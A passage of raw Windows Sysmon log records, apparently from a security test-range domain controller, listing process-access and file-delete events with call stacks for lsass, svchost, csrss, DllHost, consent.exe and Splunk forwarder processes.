Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.458{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6B5-60EB-A87D-00000000CF01}9036C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.440{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A87D-00000000CF01}9036C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.439{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6B5-60EB-A87D-00000000CF01}9036C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.387{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.387{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.387{466BC892-02B0-60E8-1600-00000000CF01}13047824C:\Windows\System32\svchost.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.387{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.372{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.340{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.340{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.340{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6B5-60EB-A77D-00000000CF01}9984C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.302{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.302{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.302{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.302{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.287{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.271{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.271{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.271{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.271{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.271{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.139{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08EC9F6C14EDD29E4BF622AE06FA9B9A,SHA256=B5CD270AEDB4A99E1E59DB38BA2B47FC8E70CB0FCCBB7B04A3A42E8C3ABCB9B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.134{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B5-60EB-A67D-00000000CF01}1428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 